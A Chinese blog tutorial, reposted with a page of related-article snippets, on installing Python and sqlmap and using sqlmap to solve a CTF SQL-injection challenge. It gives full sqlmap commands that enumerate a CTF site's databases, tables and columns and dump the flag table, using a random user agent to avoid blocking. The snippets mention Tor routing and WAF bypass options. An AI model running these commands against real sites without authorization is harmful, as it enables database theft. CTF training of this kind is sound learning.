关于sqlmap的配置和基本使用教程

最新推荐文章于 2024-07-17 12:32:24 发布
最新推荐文章于 2024-07-17 12:32:24 发布
阅读量152 收藏
点赞数
文章标签: 数据库 python
原文链接:http://www.cnblogs.com/0xk1l0-305/p/7881890.html
版权

    sqlmap是用python写的所以运行前得配置python环境。

首先进入https://www.python.org/downloads/    下载python ,一直默认安装就好了,如果需要安装到其他的盘可以修改,环境变量配置的时候注意一下就好了,安装完成后,进入cmd界面,输入python,如果安装成功应该可以出现这个界面。

 

 

然后进入http://sqlmap.org/  下载sqlmap,将下载后得到的压缩包文件解压并拷贝到安装python的文件夹。

然后在桌面新建一个cmd快捷方式,在新建的cmd快捷方式中设置起始位置为sqlmap的py程序所在的文件夹

 

 

打开sqlmap 输入如下指令 (此处测试网址为三叶草技术小组第八届极客大挑战sql注入题请切勿恶意攻击!

sqlmap.py -u"http://game.sycsec.com:2006/?id=1&submit=submit" --random-agent --dbs

这里的 --random-agent 是随机UA,我的理解是模拟浏览器,否则有的网址会因为发现是sqlmap而拒绝被访问。输入上面语句爆出数据库

因为这里的目的是得到flag,所以针对性的访问f1ag数据库。输入如下语句

sqlmap.py -u"http://game.sycsec.com:2006/?id=1&submit=submit" --random-agent -D "f1ag" --tables

得到f1ag里面的表,

(图中的字体比较奇怪,我把埚甩给了系统字体,,,,其实是flag  而不是f1ag  所以在构建语句的时候可以复制粘贴数据库中爆出的信息,不然有时候自己会很迷。)

得到数据库中的表然后是字段,输入下面语句

sqlmap.py -u"http://game.sycsec.com:2006/?id=1&submit=submit" --random-agent -D "f1ag" -T "flag" --columns

得到字段后,爆出字段内容,构造如下语句

sqlmap.py -u"http://game.sycsec.com:2006/?id=1&submit=submit" --random-agent -D "f1ag" -T "flag" -C "f4ag" --dump

就得到了flag,

 

 

over

转载于:https://www.cnblogs.com/0xk1l0-305/p/7881890.html

weixin_33940102
关注
SqlMap配置和简单使用
ruofei122的博客
04-16 2833
1、下载sqlmap的zip包(linux上可以下载tar包) 路径为:http://sqlmap.org/ 2、下载Python2.7,目前sqlmap不支持Python3.0以上版本 3、安装Python2.7,点击安装,一路默认,安装路径为“D:\Python27” 4、配置Python环境变量,并测试 打开环境变量界面,在Path后面加上Python的安装路径D:...
sqlmap配置
weixin_48303412的博客
12-08 467
1.我们先去sqlmap官网上下载sqlmap的压缩包 2.把解压后的压缩包放在python27的安装路径下(这个路径指的是) 然后配置环境变量 新增一个D:\python2.7.17\sqlmap\sqlmapproject-sqlmap-122c471变量然后就可以cmd输入sqlmap.py运行 也可以在桌面新建cmd快捷方式,属性的起始位置为sqlmap.py的路径 直接双击输入sqlmap.py启动 起始环境变量的作用就是给sqlmap提供一个路径可以快速启动 当然也可以右击sqlmap.p
渗透测试工具sqlmap基础教程
最新发布
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
最简单易懂的SQLmap配置教程,还不来看看?
Angelxiqi的博客
06-28 1820
SQLmap配置教程 SQLmap :是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。 我在这总结了一下 需要用到的资料: 1、SQLmap 2、Python2(Python3不支持SQLmap) 安装过程: 首先安装Python2,第一步直接Next下一步 第二步选择安装路径,如果需要安装到其他目录可以自行修改,设置好安装路径之后Next下一步
ibatis sqlmap配置详解
01-09
SqlMap配置是iBatis中应用的核心。这部分任务占据了iBatis开发的70的工作量。Sql Map配置文件是iBatis配置的核心,从数据库连接到执行SQL时使用的sqlMap文件都是通过此文件中的配置提供给框架的,它通常命名为sqlMapConfig.xml
sqlmap基本教程
weixin_34337381的博客
08-08 64
-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p "page,id")-D"" #指定数据库名-T"" #指定表名-C"" #指定字段-s"" #保存注入过程到一个文件 ,还可中断下次恢复在注入 (保存-s "xx.log"恢复:-s "xx.log"--resume)--level=(1-5)...
sqlmap安装包及教程.zip
12-23
在这个"sqlmap安装包及教程.zip"压缩文件中,包含了SQLMap的安装程序和后续配置的教程,这将有助于用户快速上手和熟练使用这款工具。 首先,让我们深入了解SQLMap基本概念。SQL注入是一种常见的网络安全威胁,...
SQLMAP使用教程
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 1729
用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库 -u URL,.
sqlmap使用教程
07-27
当然,我可以为您提供关于sqlmap使用的一些基本教程。以下是一些步骤和示例命令,帮助您开始使用sqlmap: 1. 安装sqlmap:您可以从sqlmap官方网站上下载并安装sqlmap。根据您的操作系统,可能需要进行一些特定的...
Sqlmap使用教程
ygyydwx的博客
03-09 2158
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 教程说明 学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap的使用。 我的另一个笔记整理:可能是网上最易懂的SQL手工注入教程【个人笔记精华整理】 针对sqlmap注入过waf,可以参考:sqlmap注入之t
SQLmap使用教程图文教程(超详细)
wangyuxiang946的博客
06-20 4万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
Sqlmap环境配置以及使用方法
YIGAOYU的博客
04-08 1328
Sqlmap介绍 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描判断是否存在SQL注入漏洞,发现并利用给定的URL的SQL注入漏洞。例如扫描 MYSQL POSTGRESQL MSSQL ACCESS ORACLE 等常见数据库。 简单来说就是扫描判断是否存在SQL注入或用来进行SQL注入。 环境安装 来到python官网: python官网 点击windows选取版本 下载安装包,...
Sqlmap参数设置_sqlmap怎么指定参数,大牛深入讲解
code8889的博客
04-15 760
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。sqlmap -u IP地址 --tor --check-tor --tor-port=9150 --tor-type=SOCKS5 --time-sec 10。
sqlmap-使用教程(自个参考用的)
weixin_42151709的博客
04-07 884
sqlmap使用教程 1.检测注入点是否可用 sqlmap.py -u “url” -u 输入指定注入点url 2.若需要用户输入[y/n],系默认需添加一个参数 sqlmap.py -u “url” --batch 注入结果显示 (1)注入参数id为GET注入,注入类型有四种分别为boolean-based、error-based、time-based blind、union query (2)...
解决sqlmap报错:[CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
茶花语的博客
03-11 2万+
解决sqlmap报错:[CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
iBatis SqlMap配置总结
scheme2008的专栏
05-20 164
核心提示:SqlMap配置是iBatis中应用的核心。这部分任务占据了iBatis开发的70的工作量。 1、命名空间: sqlMap namespace=Account,在此空间外要引用此空间的元素,则需要加上命名空间名。 2、实体的别名: typeAlias alias=Account type=com.lavasoft.ibatissut.sim SqlMap配置是iBatis中应...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值